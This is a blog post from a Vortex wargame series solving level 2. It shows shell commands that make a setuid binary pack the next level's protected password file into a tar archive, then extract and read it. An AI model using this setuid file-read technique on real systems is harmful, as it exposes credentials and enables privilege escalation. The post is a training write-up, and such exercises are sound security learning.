This is a post from my vortex Wargame series. Please find the links to my previous solutions here: Level #0 and #1.

Level 2

Level #2 was very easy, somehow even too easy :*(

At first, I thought the $$ would be expanded to the PID as it usually is the case in a shell. However, this is not the case here, in fact the filename is taken literally as there is no shell involved.

The solution is now pretty straight-forward. If we execute /vortex/vortex2, it will be executed with the privileges of vortex3 because of the setuid bit. As all it does is creating a tar file /tmp/ownership.$$.tar, we let it pack the password file /etc/vortex_pass/vortex3 into its tar, then copy the tar back and extract it.

vortex2@vortex:~$ /vortex/vortex2 /etc/vortex_pass/vortex3
/bin/tar: Removing leading `/' from member names
vortex2@vortex:~$ cp -v /tmp/ownership.\$\$.tar .
'/tmp/ownership.$$.tar' -> './ownership.$$.tar'
vortex2@vortex:~$ tar xvf ownership.\$\$.tar  
etc/vortex_pass/vortex3
vortex2@vortex:~$ cat etc/vortex_pass/vortex3 
64[...snip...]
vortex2@vortex:~$ rm -rf etc/ ownership.\$\$.tar 

Please don't forget to clean up in the /home folder, as you don't want to spoil other users.